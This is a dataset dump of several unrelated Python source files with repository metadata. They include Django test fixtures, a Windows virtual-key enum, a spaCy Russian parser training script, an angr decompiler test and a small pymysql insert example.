114991be2471eda2cf658c68706ab7bb05b06959
|
[
"MIT"
] | null | null | null |
from bom.octopart_parts_match import match_part
from bom.models import Part, PartClass, Seller, SellerPart, Subpart, \
Manufacturer, Organization, PartFile
def create_a_fake_organization(user, free=False):
org = Organization(
name="Atlas",
subscription='F' if free else 'P',
owner=user)
org.save()
return org
def create_some_fake_part_classes():
pc1 = PartClass(code=500, name='Wendy', comment='Mechanical Switches')
pc1.save()
pc2 = PartClass(code=200, name='Archibald', comment='')
pc2.save()
pc3 = PartClass(code=503, name='Ghost', comment='Like Kasper')
pc3.save()
return pc1, pc2, pc3
def create_a_fake_subpart(assembly_part, assembly_subpart, count=4):
sp1 = Subpart(
assembly_part=assembly_part,
assembly_subpart=assembly_subpart,
count=count)
sp1.save()
return sp1
def create_some_fake_sellers(organization):
s1 = Seller(name='Mouser', organization=organization)
s1.save()
s2 = Seller(name='Digi-Key', organization=organization)
s2.save()
s3 = Seller(name='Archibald', organization=organization)
s3.save()
return s1, s2, s3
def create_some_fake_manufacturers(organization):
m1 = Manufacturer(name='STMicroelectronics', organization=organization)
m1.save()
m2 = Manufacturer(name='Nordic Semiconductor', organization=organization)
m2.save()
m3 = Manufacturer(name='Murata', organization=organization)
m3.save()
return m1, m2, m3
def create_a_fake_seller_part(
seller,
part,
moq,
mpq,
unit_cost,
lead_time_days):
sp1 = SellerPart(
seller=seller,
part=part,
minimum_order_quantity=moq,
minimum_pack_quantity=mpq,
unit_cost=unit_cost,
lead_time_days=lead_time_days)
sp1.save()
return sp1
def create_some_fake_parts(organization):
(pc1, pc2, pc3) = create_some_fake_part_classes()
(m1, m2, m3) = create_some_fake_manufacturers(organization=organization)
pt1 = Part(
manufacturer_part_number='STM32F401CEU6',
number_class=pc2,
number_item='3333',
description='Brown dog',
revision='1',
manufacturer=m1,
organization=organization)
pt1.save()
pt2 = Part(
manufacturer_part_number='GRM1555C1H100JA01D',
number_class=pc1,
description='',
manufacturer=None,
organization=organization)
pt2.save()
pt3 = Part(
manufacturer_part_number='NRF51822',
number_class=pc3,
description='Friendly ghost',
manufacturer=m3,
organization=organization)
pt3.save()
create_a_fake_subpart(pt1, pt2)
create_a_fake_subpart(pt1, pt3, count=10)
(s1, s2, s3) = create_some_fake_sellers(organization=organization)
create_a_fake_seller_part(
s1,
pt1,
moq=None,
mpq=None,
unit_cost=None,
lead_time_days=None)
create_a_fake_seller_part(
s2,
pt1,
moq=1000,
mpq=5000,
unit_cost=0.1005,
lead_time_days=7)
create_a_fake_seller_part(
s2,
pt2,
moq=200,
mpq=200,
unit_cost=0,
lead_time_days=47)
return pt1, pt2, pt3
def create_a_fake_partfile(file, part):
pf1 = PartFile(file=None, part=part)
pf1.save()
return pf1
| 23.040268
| 77
| 0.642587
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 236
| 0.068745
|
426f6bd9b353f10dd5dac6c8afa818c7319f5d74
| 8,612
|
py
|
Python
|
keycodes/key/codes/win.py
|
jonchun/ptoys-mapper
|
a2dde413d37e897ec41b69ac979e538afb7435f0
|
[
"MIT"
] | null | null | null |
keycodes/key/codes/win.py
|
jonchun/ptoys-mapper
|
a2dde413d37e897ec41b69ac979e538afb7435f0
|
[
"MIT"
] | null | null | null |
keycodes/key/codes/win.py
|
jonchun/ptoys-mapper
|
a2dde413d37e897ec41b69ac979e538afb7435f0
|
[
"MIT"
] | null | null | null |
# Source:
# https://github.com/tpn/winsdk-10/blob/46c66795f49679eb4783377968ce25f6c778285a/Include/10.0.10240.0/um/WinUser.h
# # convert all C-style comments to python multi-line string comment
# find: (^/\*[\s\S\r]+?\*/)
# replace: """\n$1\n"""
# # convert all keycode #defines to be python constants
# find: #define\s(.+_.+?)\s+([\w]+)(\s*)(/[/*].+)?
# replace: $1 = $2$3# $4\n
# # clean up results by removing lines with only a single # caused by previous regex
# find: ^# $\n
# replace:
# # clean up duplicate newlines
# find: (\s#.+\n)\n
# replace: $1
# # clean up multi-line comments.
# find: ^(\s{3,})(\S.+)
# replace: $1 # $2
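# Illustrative sketch (an assumption, not part of the generated module):
# the find/replace recipe above can be automated with Python's `re` module.
import re


def _convert_defines(header_text: str) -> str:
    """Rewrite C-style ``#define NAME VALUE // comment`` lines as Python
    constants, mirroring the regex recipe documented above."""
    # keycode #defines -> python constants (trailing C comment preserved;
    # the \s* group may consume the newline, pushing '# ' to its own line)
    text = re.sub(
        r"#define\s(.+_.+?)\s+([\w]+)(\s*)(/[/*].+)?",
        r"\1 = \2\3# \4\n",
        header_text,
    )
    # drop the lines left holding only a lone '# ' by the previous pass
    text = re.sub(r"^# $\n", "", text, flags=re.MULTILINE)
    return text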
from enum import IntEnum
class WinCodes(IntEnum):
"""
/*
* Virtual Keys, Standard Set
*/
"""
VK_LBUTTON = 0x01
VK_RBUTTON = 0x02
VK_CANCEL = 0x03
VK_MBUTTON = 0x04 # /* NOT contiguous with L & RBUTTON */
# if(_WIN32_WINNT >= 0x0500)
VK_XBUTTON1 = 0x05 # /* NOT contiguous with L & RBUTTON */
VK_XBUTTON2 = 0x06 # /* NOT contiguous with L & RBUTTON */
# endif /* _WIN32_WINNT >= 0x0500 */
"""
/*
* 0x07 : reserved
*/
"""
VK_BACK = 0x08
VK_TAB = 0x09
"""
/*
* 0x0A - 0x0B : reserved
*/
"""
VK_CLEAR = 0x0C
VK_RETURN = 0x0D
"""
/*
* 0x0E - 0x0F : unassigned
*/
"""
VK_SHIFT = 0x10
VK_CONTROL = 0x11
VK_MENU = 0x12
VK_PAUSE = 0x13
VK_CAPITAL = 0x14
VK_KANA = 0x15
VK_HANGEUL = 0x15 # /* old name - should be here for compatibility */
VK_HANGUL = 0x15
"""
/*
* 0x16 : unassigned
*/
"""
VK_JUNJA = 0x17
VK_FINAL = 0x18
VK_HANJA = 0x19
VK_KANJI = 0x19
"""
/*
* 0x1A : unassigned
*/
"""
VK_ESCAPE = 0x1B
VK_CONVERT = 0x1C
VK_NONCONVERT = 0x1D
VK_ACCEPT = 0x1E
VK_MODECHANGE = 0x1F
VK_SPACE = 0x20
VK_PRIOR = 0x21
VK_NEXT = 0x22
VK_END = 0x23
VK_HOME = 0x24
VK_LEFT = 0x25
VK_UP = 0x26
VK_RIGHT = 0x27
VK_DOWN = 0x28
VK_SELECT = 0x29
VK_PRINT = 0x2A
VK_EXECUTE = 0x2B
VK_SNAPSHOT = 0x2C
VK_INSERT = 0x2D
VK_DELETE = 0x2E
VK_HELP = 0x2F
"""
/*
* VK_0 - VK_9 are the same as ASCII '0' - '9' (0x30 - 0x39)
* 0x3A - 0x40 : unassigned
* VK_A - VK_Z are the same as ASCII 'A' - 'Z' (0x41 - 0x5A)
*/
"""
VK_0 = 0x30
VK_1 = 0x31
VK_2 = 0x32
VK_3 = 0x33
VK_4 = 0x34
VK_5 = 0x35
VK_6 = 0x36
VK_7 = 0x37
VK_8 = 0x38
VK_9 = 0x39
VK_A = 0x41
VK_B = 0x42
VK_C = 0x43
VK_D = 0x44
VK_E = 0x45
VK_F = 0x46
VK_G = 0x47
VK_H = 0x48
VK_I = 0x49
VK_J = 0x4A
VK_K = 0x4B
VK_L = 0x4C
VK_M = 0x4D
VK_N = 0x4E
VK_O = 0x4F
VK_P = 0x50
VK_Q = 0x51
VK_R = 0x52
VK_S = 0x53
VK_T = 0x54
VK_U = 0x55
VK_V = 0x56
VK_W = 0x57
VK_X = 0x58
VK_Y = 0x59
VK_Z = 0x5A
VK_LWIN = 0x5B
VK_RWIN = 0x5C
VK_APPS = 0x5D
"""
/*
* 0x5E : reserved
*/
"""
VK_SLEEP = 0x5F
VK_NUMPAD0 = 0x60
VK_NUMPAD1 = 0x61
VK_NUMPAD2 = 0x62
VK_NUMPAD3 = 0x63
VK_NUMPAD4 = 0x64
VK_NUMPAD5 = 0x65
VK_NUMPAD6 = 0x66
VK_NUMPAD7 = 0x67
VK_NUMPAD8 = 0x68
VK_NUMPAD9 = 0x69
VK_MULTIPLY = 0x6A
VK_ADD = 0x6B
VK_SEPARATOR = 0x6C
VK_SUBTRACT = 0x6D
VK_DECIMAL = 0x6E
VK_DIVIDE = 0x6F
VK_F1 = 0x70
VK_F2 = 0x71
VK_F3 = 0x72
VK_F4 = 0x73
VK_F5 = 0x74
VK_F6 = 0x75
VK_F7 = 0x76
VK_F8 = 0x77
VK_F9 = 0x78
VK_F10 = 0x79
VK_F11 = 0x7A
VK_F12 = 0x7B
VK_F13 = 0x7C
VK_F14 = 0x7D
VK_F15 = 0x7E
VK_F16 = 0x7F
VK_F17 = 0x80
VK_F18 = 0x81
VK_F19 = 0x82
VK_F20 = 0x83
VK_F21 = 0x84
VK_F22 = 0x85
VK_F23 = 0x86
VK_F24 = 0x87
# if(_WIN32_WINNT >= 0x0604)
"""
/*
* 0x88 - 0x8F : UI navigation
*/
"""
VK_NAVIGATION_VIEW = 0x88
VK_NAVIGATION_MENU = 0x89
VK_NAVIGATION_UP = 0x8A
VK_NAVIGATION_DOWN = 0x8B
VK_NAVIGATION_LEFT = 0x8C
VK_NAVIGATION_RIGHT = 0x8D
VK_NAVIGATION_ACCEPT = 0x8E
VK_NAVIGATION_CANCEL = 0x8F
# endif /* _WIN32_WINNT >= 0x0604 */
VK_NUMLOCK = 0x90
VK_SCROLL = 0x91
"""
/*
* NEC PC-9800 kbd definitions
*/
"""
VK_OEM_NEC_EQUAL = 0x92 # // '=' key on numpad
"""
/*
* Fujitsu/OASYS kbd definitions
*/
"""
VK_OEM_FJ_JISHO = 0x92 # // 'Dictionary' key
VK_OEM_FJ_MASSHOU = 0x93 # // 'Unregister word' key
VK_OEM_FJ_TOUROKU = 0x94 # // 'Register word' key
VK_OEM_FJ_LOYA = 0x95 # // 'Left OYAYUBI' key
VK_OEM_FJ_ROYA = 0x96 # // 'Right OYAYUBI' key
"""
/*
* 0x97 - 0x9F : unassigned
*/
"""
"""
/*
* VK_L* & VK_R* - left and right Alt, Ctrl and Shift virtual keys.
* Used only as parameters to GetAsyncKeyState() and GetKeyState().
* No other API or message will distinguish left and right keys in this way.
*/
"""
VK_LSHIFT = 0xA0
VK_RSHIFT = 0xA1
VK_LCONTROL = 0xA2
VK_RCONTROL = 0xA3
VK_LMENU = 0xA4
VK_RMENU = 0xA5
# if(_WIN32_WINNT >= 0x0500)
VK_BROWSER_BACK = 0xA6
VK_BROWSER_FORWARD = 0xA7
VK_BROWSER_REFRESH = 0xA8
VK_BROWSER_STOP = 0xA9
VK_BROWSER_SEARCH = 0xAA
VK_BROWSER_FAVORITES = 0xAB
VK_BROWSER_HOME = 0xAC
VK_VOLUME_MUTE = 0xAD
VK_VOLUME_DOWN = 0xAE
VK_VOLUME_UP = 0xAF
VK_MEDIA_NEXT_TRACK = 0xB0
VK_MEDIA_PREV_TRACK = 0xB1
VK_MEDIA_STOP = 0xB2
VK_MEDIA_PLAY_PAUSE = 0xB3
VK_LAUNCH_MAIL = 0xB4
VK_LAUNCH_MEDIA_SELECT = 0xB5
VK_LAUNCH_APP1 = 0xB6
VK_LAUNCH_APP2 = 0xB7
# endif /* _WIN32_WINNT >= 0x0500 */
"""
/*
* 0xB8 - 0xB9 : reserved
*/
"""
VK_OEM_1 = 0xBA # // ';:' for US
VK_OEM_PLUS = 0xBB # // '+' any country
VK_OEM_COMMA = 0xBC # // ',' any country
VK_OEM_MINUS = 0xBD # // '-' any country
VK_OEM_PERIOD = 0xBE # // '.' any country
VK_OEM_2 = 0xBF # // '/?' for US
VK_OEM_3 = 0xC0 # // '`~' for US
"""
/*
* 0xC1 - 0xC2 : reserved
*/
"""
# if(_WIN32_WINNT >= 0x0604)
"""
/*
* 0xC3 - 0xDA : Gamepad input
*/
"""
VK_GAMEPAD_A = 0xC3
VK_GAMEPAD_B = 0xC4
VK_GAMEPAD_X = 0xC5
VK_GAMEPAD_Y = 0xC6
VK_GAMEPAD_RIGHT_SHOULDER = 0xC7
VK_GAMEPAD_LEFT_SHOULDER = 0xC8
VK_GAMEPAD_LEFT_TRIGGER = 0xC9
VK_GAMEPAD_RIGHT_TRIGGER = 0xCA
VK_GAMEPAD_DPAD_UP = 0xCB
VK_GAMEPAD_DPAD_DOWN = 0xCC
VK_GAMEPAD_DPAD_LEFT = 0xCD
VK_GAMEPAD_DPAD_RIGHT = 0xCE
VK_GAMEPAD_MENU = 0xCF
VK_GAMEPAD_VIEW = 0xD0
VK_GAMEPAD_LEFT_THUMBSTICK_BUTTON = 0xD1
VK_GAMEPAD_RIGHT_THUMBSTICK_BUTTON = 0xD2
VK_GAMEPAD_LEFT_THUMBSTICK_UP = 0xD3
VK_GAMEPAD_LEFT_THUMBSTICK_DOWN = 0xD4
VK_GAMEPAD_LEFT_THUMBSTICK_RIGHT = 0xD5
VK_GAMEPAD_LEFT_THUMBSTICK_LEFT = 0xD6
VK_GAMEPAD_RIGHT_THUMBSTICK_UP = 0xD7
VK_GAMEPAD_RIGHT_THUMBSTICK_DOWN = 0xD8
VK_GAMEPAD_RIGHT_THUMBSTICK_RIGHT = 0xD9
VK_GAMEPAD_RIGHT_THUMBSTICK_LEFT = 0xDA
# endif /* _WIN32_WINNT >= 0x0604 */
VK_OEM_4 = 0xDB # // '[{' for US
VK_OEM_5 = 0xDC # // '\|' for US
VK_OEM_6 = 0xDD # // ']}' for US
VK_OEM_7 = 0xDE # // ''"' for US
VK_OEM_8 = 0xDF
"""
/*
* 0xE0 : reserved
*/
"""
"""
/*
* Various extended or enhanced keyboards
*/
"""
VK_OEM_AX = 0xE1 # // 'AX' key on Japanese AX kbd
VK_OEM_102 = 0xE2 # // "<>" or "\|" on RT 102-key kbd.
VK_ICO_HELP = 0xE3 # // Help key on ICO
VK_ICO_00 = 0xE4 # // 00 key on ICO
# if(WINVER >= 0x0400)
VK_PROCESSKEY = 0xE5
# endif /* WINVER >= 0x0400 */
VK_ICO_CLEAR = 0xE6
# if(_WIN32_WINNT >= 0x0500)
VK_PACKET = 0xE7
# endif /* _WIN32_WINNT >= 0x0500 */
"""
/*
* 0xE8 : unassigned
*/
"""
"""
/*
* Nokia/Ericsson definitions
*/
"""
VK_OEM_RESET = 0xE9
VK_OEM_JUMP = 0xEA
VK_OEM_PA1 = 0xEB
VK_OEM_PA2 = 0xEC
VK_OEM_PA3 = 0xED
VK_OEM_WSCTRL = 0xEE
VK_OEM_CUSEL = 0xEF
VK_OEM_ATTN = 0xF0
VK_OEM_FINISH = 0xF1
VK_OEM_COPY = 0xF2
VK_OEM_AUTO = 0xF3
VK_OEM_ENLW = 0xF4
VK_OEM_BACKTAB = 0xF5
VK_ATTN = 0xF6
VK_CRSEL = 0xF7
VK_EXSEL = 0xF8
VK_EREOF = 0xF9
VK_PLAY = 0xFA
VK_ZOOM = 0xFB
VK_NONAME = 0xFC
VK_PA1 = 0xFD
VK_OEM_CLEAR = 0xFE
"""
/*
* 0xFF : reserved
*/
"""
# Custom Value Added
VK_DISABLED = 0x100
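# Minimal usage sketch (assumed, not from the original header): IntEnum
# members compare equal to their integer values, so these constants are
# drop-in replacements for raw VK_* integers.
if __name__ == "__main__":
    assert WinCodes.VK_A == 0x41
    assert WinCodes(0x0D) is WinCodes.VK_RETURN
    print(WinCodes.VK_LWIN.name, hex(WinCodes.VK_LWIN.value))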
| 20.407583
| 114
| 0.576637
| 7,941
| 0.922085
| 0
| 0
| 0
| 0
| 0
| 0
| 3,092
| 0.359034
|
426fdd67326d3cc89802cd8abeba99af022807c1
| 117
|
py
|
Python
|
application/flicket_errors/__init__.py
|
abbas0001/flicket
|
547a5e783cccf157d10df88608440aa2919d7e7b
|
[
"MIT"
] | null | null | null |
application/flicket_errors/__init__.py
|
abbas0001/flicket
|
547a5e783cccf157d10df88608440aa2919d7e7b
|
[
"MIT"
] | null | null | null |
application/flicket_errors/__init__.py
|
abbas0001/flicket
|
547a5e783cccf157d10df88608440aa2919d7e7b
|
[
"MIT"
] | null | null | null |
#! python3
# -*- coding: utf-8 -*-
#
from flask import Blueprint
bp_errors = Blueprint('flicket-errors', __name__)
| 14.625
| 49
| 0.683761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 50
| 0.42735
|
4270b9f3f72e8e2eb3176ce2f540c1dc258f357c
| 399
|
py
|
Python
|
SmartBuild/modules/migrations/0003_module_shortcut.py
|
ampamo/smart-build
|
a0c9a3871eb7ca06a6cd6d4a15aba70e2291f4fb
|
[
"CC0-1.0"
] | null | null | null |
SmartBuild/modules/migrations/0003_module_shortcut.py
|
ampamo/smart-build
|
a0c9a3871eb7ca06a6cd6d4a15aba70e2291f4fb
|
[
"CC0-1.0"
] | null | null | null |
SmartBuild/modules/migrations/0003_module_shortcut.py
|
ampamo/smart-build
|
a0c9a3871eb7ca06a6cd6d4a15aba70e2291f4fb
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('modules', '0002_module_floor'),
]
operations = [
migrations.AddField(
model_name='module',
name='shortcut',
field=models.BooleanField(default=False),
),
]
| 19.95
| 53
| 0.601504
| 290
| 0.726817
| 0
| 0
| 0
| 0
| 0
| 0
| 69
| 0.172932
|
4273f06b359f41b03bbac8b02773bc579762c6fd
| 6,789
|
py
|
Python
|
app/common.py
|
yxonic/dl-boilerplate
|
d503716ad514929ddfdc41341e37b0e3f1a1f0f5
|
[
"MIT"
] | 1
|
2017-09-26T05:13:19.000Z
|
2017-09-26T05:13:19.000Z
|
app/common.py
|
yxonic/dl-boilerplate
|
d503716ad514929ddfdc41341e37b0e3f1a1f0f5
|
[
"MIT"
] | null | null | null |
app/common.py
|
yxonic/dl-boilerplate
|
d503716ad514929ddfdc41341e37b0e3f1a1f0f5
|
[
"MIT"
] | null | null | null |
import abc
import argparse
import logging
import pathlib
from collections import namedtuple
from operator import itemgetter
import toml
class NotConfiguredError(Exception):
pass
class ParseError(Exception):
pass
class Model(abc.ABC):
"""Interface for model that can save/load parameters.
    Each model class should have an ``add_arguments`` class method to define
    model arguments along with their types, default values, etc.
"""
@classmethod
@abc.abstractmethod
def add_arguments(cls, parser: argparse.ArgumentParser):
"""Add arguments to an argparse subparser."""
raise NotImplementedError
@classmethod
def build(cls, **kwargs):
"""Build model. Parameters are specified by keyword arguments.
Example:
>>> from models import Simple
>>> model = Simple.build(foo=3)
>>> print(model.config)
Config(foo=3)
"""
keys, values = zip(*sorted(list(kwargs.items()), key=itemgetter(0)))
config = namedtuple(cls.__name__, keys)(*values)
return cls(config)
@classmethod
def parse(cls, args):
"""Parse command-line options and build model."""
class _ArgumentParser(argparse.ArgumentParser):
def error(self, message):
raise ParseError(message)
parser = _ArgumentParser(prog='', add_help=False)
cls.add_arguments(parser)
args = parser.parse_args(args)
config = dict(args._get_kwargs())
Model._unfold_config(config)
return cls.build(**config)
def __init__(self, config):
"""
Args:
config (namedtuple): model configuration
"""
self.config = config
def __str__(self):
return str(self.config)
@staticmethod
def _unfold_config(cfg):
for k, v in list(cfg.items()):
if isinstance(v, dict):
Model._unfold_config(v)
if '.' not in k:
continue
d = cfg
for sec in k.split('.')[:-1]:
if sec in d:
d = d[sec]
else:
d[sec] = {}
d = d[sec]
d[k.split('.')[-1]] = v
del cfg[k]
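    # Example (an assumed illustration): _unfold_config rewrites dotted keys
    # into nested dicts in place, e.g.
    #   {'opt.lr': 0.1, 'foo': 3}  ->  {'foo': 3, 'opt': {'lr': 0.1}}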
class Workspace:
"""Workspace utilities. One can save/load configurations, build models
with specific configuration, save snapshots, open results, etc., using
workspace objects."""
def __init__(self, path: str, model=None, config=None):
self._path = pathlib.Path(path)
self._log_path = self._path / 'log'
self._snapshot_path = self._path / 'snapshot'
self._result_path = self._path / 'result'
if model is None:
self._model_cls = None
self._config = None
return
if config is None:
config = {}
self._set_model(model, config)
self._save()
def __str__(self):
return str(self.path)
def __repr__(self):
return 'Workspace(path=' + str(self.path) + ')'
def _set_model(self, model, config):
if isinstance(model, str):
self._model_cls = Workspace._get_class(model)
else:
self._model_cls = model
self._config = config
@staticmethod
def _get_class(name):
from . import models as mm
return getattr(mm, name)
@property
def path(self):
if not self._path.exists():
self._path.mkdir(parents=True)
return self._path
@property
def result_path(self):
if not self._result_path.exists():
self._result_path.mkdir(parents=True)
return self._result_path
@property
def snapshot_path(self):
if not self._snapshot_path.exists():
self._snapshot_path.mkdir(parents=True)
return self._snapshot_path
@property
def log_path(self):
if not self._log_path.exists():
self._log_path.mkdir(parents=True)
return self._log_path
@property
def model_name(self):
return self.model_cls.__name__
@property
def model_cls(self):
if self._model_cls is not None:
return self._model_cls
self._load()
return self._model_cls
@property
def config(self):
if self._config is not None:
return self._config
self._load()
return self._config
def setup_like(self, model: Model):
"""Configure workspace with configurations from a given model.
Args:
model (Model): model to be used
"""
self._set_model(model.__class__, model.config._asdict())
def build_model(self):
"""Build model according to the configurations in current
workspace."""
return self.model_cls.build(**self.config)
def logger(self, name: str):
"""Get a logger that logs to a file.
Notice that same logger instance is returned for same names.
Args:
name(str): logger name
"""
logger = logging.getLogger(name)
if logger.handlers:
# previously configured, remain unchanged
return logger
fileFormatter = logging.Formatter('%(levelname)s [%(name)s] '
'%(asctime)s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
fileHandler = logging.FileHandler(
str(self.log_path / (name + '.log')))
fileHandler.setFormatter(fileFormatter)
logger.addHandler(fileHandler)
return logger
def _load(self):
"""Load configuration."""
try:
cfg = toml.load((self.path / 'config.toml').open())
self._set_model(cfg['model_name'], cfg[cfg['model_name'].lower()])
except (FileNotFoundError, KeyError):
raise NotConfiguredError('config.toml doesn\'t exist or '
'is incomplete')
def _save(self):
"""Save configuration."""
f = (self.path / 'config.toml').open('w')
toml.dump({'model_name': self.model_name,
self.model_name.lower(): self.config}, f)
f.close()
class Command(abc.ABC):
"""Command interface."""
def __init__(self, parser):
self.parser = parser
def _run(self, args):
ws = Workspace(args.workspace)
cmd = args.command
del args.command, args.func, args.workspace
args = {name: value for (name, value) in args._get_kwargs()}
args = namedtuple(cmd.capitalize(), args.keys())(*args.values())
return self.run(ws, args)
@abc.abstractmethod
def run(self, ws, args):
raise NotImplementedError
| 28.405858
| 78
| 0.577405
| 6,637
| 0.977611
| 0
| 0
| 2,782
| 0.409781
| 0
| 0
| 1,529
| 0.225217
|
4274e96e6ce5245f31a18bf5087d02fdafd53341
| 2,737
|
py
|
Python
|
training/train_pos_dep.py
|
ex00/spacy-ru
|
7284d8127dca322fcc2aa9ce0267699cfc9baf38
|
[
"MIT"
] | null | null | null |
training/train_pos_dep.py
|
ex00/spacy-ru
|
7284d8127dca322fcc2aa9ce0267699cfc9baf38
|
[
"MIT"
] | null | null | null |
training/train_pos_dep.py
|
ex00/spacy-ru
|
7284d8127dca322fcc2aa9ce0267699cfc9baf38
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals, print_function
import sys
from pathlib import Path
import spacy
from spacy.lang.ru import Russian
from spacy.pipeline import Tagger, DependencyParser
from spacy.util import fix_random_seed, set_lang_class
from models.dep import MyDEP
from models.loadvec import get_ft_vec
from models.pos import MyPOS
from models.t2v import build_tok2vec
from training.corpora.syntagrus import get_syntagrus_example, get_syntagrus
from training.trainer import Trainer, Extractor
from utils.corpus import tag_morphology
CFG = {"device": 0, 'verbose': 1}
GPU_1 = "-g1" in sys.argv[1:]
if GPU_1:
CFG["device"] = 1
TESTS = False
spacy.require_gpu(CFG['device'])
TEST_MODE = "--test" in sys.argv[1:]
if TEST_MODE:
SynTagRus = get_syntagrus_example(Path("data/syntagrus/"))
else:
SynTagRus = get_syntagrus(Path("data/syntagrus/"))
def create_pos(nlp, cls=MyPOS, labels=[], **opts):
pos = cls(nlp.vocab, **opts)
for e in labels:
pos.add_label(e, tag_morphology(e))
return pos
def create_dep(nlp, cls=MyDEP, labels=[], **opts):
dep = cls(nlp.vocab, **opts)
# for e in labels:
# dep.add_label(e)
return dep
ft_vectors = get_ft_vec()
tok2vec = build_tok2vec(embed_size=2000, vectors={"word_vectors": ft_vectors})
def smoke_test():
nlp = spacy.blank("ru")
nlp.add_pipe(create_pos(nlp))
nlp.add_pipe(create_dep(nlp))
nlp.vocab.morphology.tag_map.clear()
nlp.begin_training(tok2vec=tok2vec, **CFG)
if TEST_MODE:
print(nlp.pipeline)
dep = nlp.get_pipe('parser')
if TEST_MODE:
print(dep(nlp.tokenizer("приветы всем")))
class Russian2(Russian):
lang = "ru"
def train_spacy(nlp, epochs):
# set_lang_class('ru2', Russian2)
extractor = Extractor()
cfg = {'tok2vec': tok2vec, **CFG}
fix_random_seed()
trainer = Trainer(nlp, SynTagRus.ds_train, SynTagRus.ds_test, extractor, **cfg)
nlp.vocab.morphology.tag_map.clear()
trainer.train(epochs=epochs)
def main():
smoke_test()
nlp = spacy.blank("ru")
nlp.vocab.morphology.tag_map.clear()
nlp.add_pipe(create_pos(nlp, labels=[]))
nlp.add_pipe(create_dep(nlp, labels=[], config={'learn_tokens': False}))
# nlp.add_pipe(create_pos(nlp, cls=Tagger, labels=SynTagRus.pos))
# nlp.add_pipe(create_dep(nlp, cls=DependencyParser, labels=SynTagRus.dep, config={'learn_tokens': False}))
if TEST_MODE:
print(nlp.pipeline)
# nlp.add_pipe(create_pos(nlp, labels=SynTagRus.pos))
# nlp.add_pipe(create_dep(nlp, labels=SynTagRus.dep, config={'learn_tokens': False}))
if TEST_MODE:
train_spacy(nlp, epochs=5)
else:
train_spacy(nlp, epochs=50)
if __name__ == "__main__":
main()
| 27.646465
| 111
| 0.700037
| 40
| 0.014556
| 0
| 0
| 0
| 0
| 0
| 0
| 554
| 0.201601
|
4275177baedf41f1ab31ef0704dfda58eb058f5e
| 1,512
|
py
|
Python
|
tests/test_peephole_optimizations.py
|
capuanob/angr
|
4e5bb119965cb282f5bcb3dea5b598e88097f715
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_peephole_optimizations.py
|
capuanob/angr
|
4e5bb119965cb282f5bcb3dea5b598e88097f715
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_peephole_optimizations.py
|
capuanob/angr
|
4e5bb119965cb282f5bcb3dea5b598e88097f715
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=missing-class-docstring,no-self-use
import os
import unittest
import archinfo
import ailment
import angr
from angr.analyses.decompiler.peephole_optimizations import ConstantDereferences
test_location = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'binaries', 'tests')
class TestPeepholeOptimizations(unittest.TestCase):
def test_constant_dereference(self):
        # a = *(A) :=> a = the variable at A iff
# - A is a pointer that points to a read-only section.
proj = angr.Project(os.path.join(test_location, "armel", "decompiler", "rm"), auto_load_libs=False)
expr = ailment.Expr.Load(None, ailment.Expr.Const(None, None, 0xa000, proj.arch.bits),
proj.arch.bytes, archinfo.Endness.LE, ins_addr=0x400100)
opt = ConstantDereferences(proj, proj.kb, 0)
optimized = opt.optimize(expr)
assert isinstance(optimized, ailment.Const)
assert optimized.value == 0x183f8
assert optimized.tags.get('ins_addr', None) == 0x400100, "Peephole optimizer lost tags."
# multiple cases that no optimization should happen
# a. Loading a pointer from a writable location
expr = ailment.Expr.Load(None, ailment.Expr.Const(None, None, 0x21df4, proj.arch.bits), 1, archinfo.Endness.LE)
opt = ConstantDereferences(proj, proj.kb, 0)
optimized = opt.optimize(expr)
assert optimized is None
if __name__ == "__main__":
unittest.main()
| 38.769231
| 119
| 0.683201
| 1,148
| 0.759259
| 0
| 0
| 0
| 0
| 0
| 0
| 346
| 0.228836
|
42755fd81a38eefae8f526ffb8db205e1141d33b
| 604
|
py
|
Python
|
PySpace/mysql/mysql_insertdata.py
|
dralee/LearningRepository
|
4324d3c5ac1a12dde17ae70c1eb7f3d36a047ba4
|
[
"Apache-2.0"
] | null | null | null |
PySpace/mysql/mysql_insertdata.py
|
dralee/LearningRepository
|
4324d3c5ac1a12dde17ae70c1eb7f3d36a047ba4
|
[
"Apache-2.0"
] | null | null | null |
PySpace/mysql/mysql_insertdata.py
|
dralee/LearningRepository
|
4324d3c5ac1a12dde17ae70c1eb7f3d36a047ba4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
# File: mysql_insertdata.py
import pymysql
# Open the database connection
db = pymysql.connect(host='localhost', user='root', password='1234', database='fdtest')
# Create a cursor object using the cursor() method
cursor = db.cursor()
# The SQL INSERT statement
sql = """INSERT INTO EMPLOYEE(
    FIRST_NAME,LAST_NAME,AGE,SEX,INCOME)
    VALUES('Mac2','Mohan2',20,'M',6000)"""
"""
Or, built with string formatting:
sql = "INSERT INTO EMPLOYEE(FIRST_NAME, \
    LAST_NAME, AGE, SEX, INCOME) \
    VALUES ('%s', '%s', '%d', '%c', '%d' )" % \
    ('Mac', 'Mohan', 20, 'M', 2000)
"""
try:
    # Execute the SQL statement
    cursor.execute(sql)
    # Commit the changes to the database
    db.commit()
except Exception:
    # Roll back on error
    db.rollback()
# Close the database connection
db.close()
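# A minimal sketch of the safer, parameterized form (same assumed connection
# values as above); %s placeholders let the driver handle quoting and help
# prevent SQL injection:
def insert_employee_safely():
    conn = pymysql.connect(host='localhost', user='root',
                           password='1234', database='fdtest')
    try:
        with conn.cursor() as cur:
            cur.execute(
                "INSERT INTO EMPLOYEE(FIRST_NAME, LAST_NAME, AGE, SEX, INCOME)"
                " VALUES (%s, %s, %s, %s, %s)",
                ('Mac', 'Mohan', 20, 'M', 2000))
        conn.commit()
    finally:
        conn.close()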
| 16.777778
| 56
| 0.61755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 552
| 0.773109
|
42787867fa3db8b6721924f36a9b0de8973ee0ae
| 1,572
|
py
|
Python
|
appleseed_python.py
|
AllegorithmicSAS/sat-scons
|
3eea609385fb9bdd93562097d302a3707c3c6ebe
|
[
